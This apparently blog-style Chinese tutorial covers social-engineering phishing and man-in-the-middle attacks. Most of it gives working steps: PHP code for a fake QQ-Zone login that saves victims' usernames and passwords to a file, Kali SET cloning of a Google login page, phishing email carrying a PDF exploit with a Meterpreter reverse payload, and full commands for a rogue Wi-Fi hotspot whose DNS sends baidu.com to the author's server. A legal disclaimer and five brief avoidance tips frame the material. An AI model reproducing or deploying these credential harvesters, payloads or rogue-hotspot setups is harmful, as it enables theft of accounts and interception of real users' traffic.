Admin Tean
首发于Admin Tean
社工之网络钓鱼中间人攻击

社工之网络钓鱼中间人攻击

注:文章内容仅供参考学习,任何人不得用于非法测试。请遵守国家法律,做一个守法的良好公民。


0x00 服务器端搭建的钓鱼页面

这种钓鱼页面,较为常见,攻击者注册与相关网站类似的域名,然后利用该网站的主页或登录页面进行诱骗,引诱被攻击者输入账号密码等个人信息。

这里利用手里闲置的阿里的一台服务器给大家做一下演示,构造一个简单的手机端钓鱼页面。

先来看一下后端的主要代码:

<?php
  if (isset($_POST["user"])) {
    if (isset($_POST["pass"])) {
      $myfile = fopen("fish.txt", "a") or die("Unable to open file!");
      $txt = "账号".$_POST["user"]." 密码".$_POST["pass"];
      fwrite($myfile, $txt);
      fclose($myfile);
      //在这里他完成输入之后进行跳转
      echo '<script>window.location.href="http://qzone.qq.com/"; </script>';//echo是输出函数,可以输出文本或者变量
    }
  }
?>


可以看到在被攻击者输入账号密码以后,信息被提交到同目录下的 fish.txt 中,然后进行网站的跳转,跳转到真实的 qq 空间页面。

该页面的第一个选项是没有用的,用户只能点击第二个选项,然后跳转到如下页面。



在手机端是看不出什么异常的,但是我们用电脑打开看看。



在电脑端打开的网站,url 地址显示的是该钓鱼页面搭建的服务器域名和地址。

如果在这里我们输入了账号和密码,信息就会到 fist.txt 中。

而且如果你的手机有qq空间app的客户端,不管你输入什么,都是会直接跳转到你的空间的,在你没觉得有什么事情发生时,你的信息就已经泄露了。





0x01 用 kali set 生成的钓鱼网站

这里我们先来利用 社会工程学工具包 SET 中自带的模块来生成 goole 的钓鱼页面。







生成以后我们访问该 ip 地址,可以看到是 goole 的登录页面,而且这个时候 kali 接受到一条访问 ip 的信息,我们尝试输入信息,点击登录,kail中就可以直接得到信息。






在倒数第二步我们选择2.site clone ,还可以克隆其它页面。这里我又尝试了去克隆 qq 空间的登录页面。

不过这里我发现在你 qq 登录的情况下,钓鱼页面会直接进入真正的 qq 空间的登录页面,而且如果你使用快捷登录的方式或者扫码登录的方式,信息是不会被监听到的。

给大家录了个小视频,可以看一下:

因为,这里视频审核未通过。我也不知道什么原因。请扫码关注后查看。原文


0x02 用 kali set 发送钓鱼邮件

这里我们尝试构造一个利用了 Adobe PDF 的 Collab.collectEmailInfo(堆溢出攻击) 漏洞,然后默认将 Metasploit 中的 Meterpreter 反向攻击荷载记载到 PDF 文件中,假如目标机中安装有 Adobe Acrobat ,且存在该漏洞,我们就可以在对方打开文件时,钓鱼成功。

下面是具体操作:










163邮箱的 SMTP 服务授权码设置见下:



邮件发送成功就像这样。



但是,这个测试的时候,生成的带有 Payload 的附件,有时候会被检测出来。我们来查看这个报错返回了什么,报错状态码为 554,我们查看后面的链接可以看到是因为附件被163检测出来了。






0x04 利用钓鱼热点钓鱼

这次我们利用 kali 和一个无线网卡,来构造一个钓鱼热点,本地搭建 DNS 服务,修改 DNS 服务配置来欺骗受害者。

将 kali 与物理机进行桥接,与物理机在一个网段,然后插入无线网卡。



因为要启动 dhcp 服务,我们先给虚拟网卡 eth0 设置一个静态 ip 地址,

gedit /etc/network/interfaces

iface eth0 inet static //说明静态配置
auto eth0  //指定网卡
address 192.168.43.76 //配置静态ip
netmask 255.255.255.0 //子网掩码
gateway 192.168.43.1  //网关

重启 kali 的网络。之后我们将网卡 wlan0 设置为监听模式。

ifconfig wlan0 down 
iwconfig wlan0 mode monitor 
ifconfig wlan0 up

接下来我们使用命令airbase-ng -e CICO -c 11 wlan0mon去创建 WIFI 。


保持该进程,重新打开一个终端,配置 wifi 网关。


ifconfig at0 up //启动新建的 at0 虚拟网卡

gedit /etc/network/interfaces

auto at0 
iface at0 inet static 
address 192.168.1.1 
netmask 255.255.255.0

重启 kali 的网络,可以看到 at0 已经有 ip 地址了。



接下来我们再来安装配置 dhcp 服务,没有该服务,手机无法连接钓鱼 wifi。

安装以后,我们设置一下网段,子网掩码,网关地址,默认 dns 服务器地址,配置如下:

gedit /etc/dhcp/dhcpd.conf

subnet 192.168.1.0 netmask 255.255.255.0 {    
  range 192.168.1.100 192.168.1.150;    
  option routers 192.168.1.1;    
  option subnet-mask 255.255.255.0;    
  option domain-name-servers 192.168.43.76; }

将 at0 指定为 dhcp 的网卡。

gedit /etc/default/isc-dhcp-server

INTERFACESv4 = 'at0'

重新启动 dhcp 服务。

下面我们来配置最重要的地方,就是 dns 服务,以 dnsmasq 为例,具体配置大家可以参考这篇文章。

sp4rkw.blog.csdn.net/ar

我们之所以可以用该热点钓鱼成功就在于 dns 服务的配置,安装以后我们进行如下配置:

gedit /etc/dnsmasq.conf

resolv-file=/etc/resolv.conf 
strict-order  
listen-address=192.168.43.76
address=/baidu.com/47.**.**.** //将域名解析到如下地址,该例中我尝试将baidu.com的域名解析到我自己的服务器下。
server=8.8.8.8  
server=114.114.114.114

重启 dnsmasq 服务。

打开 linux 内核的转发模块,并用 iptables 进行规制编写,命令如下:


echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.43.76

这里我们就完成了钓鱼热点的搭建,连上热点的手机访问百度的域名都会被解析到我的服务器地址......

0x05 避免钓鱼方法总结

(1.)不要随意连公共的 WIFI 网络。

(2.)涉及到账户,密码等个人信息的提交登录时,确保网络环境可信。

(3.)尽量不使用账号密码的登录方式登录。

(4.)垃圾或者来历不明的邮件附件不要查看。

(5.)别相信绝对安全。


福利

既然你能看到这里,说明是真爱粉。

关注公众号后, 回复“福利”二字即可抽奖。





注:文章内容仅供参考学习,任何人不得用于非法测试。请遵守国家法律,做一个守法的良好公民。


编辑于 2019-11-08

文章被以下专栏收录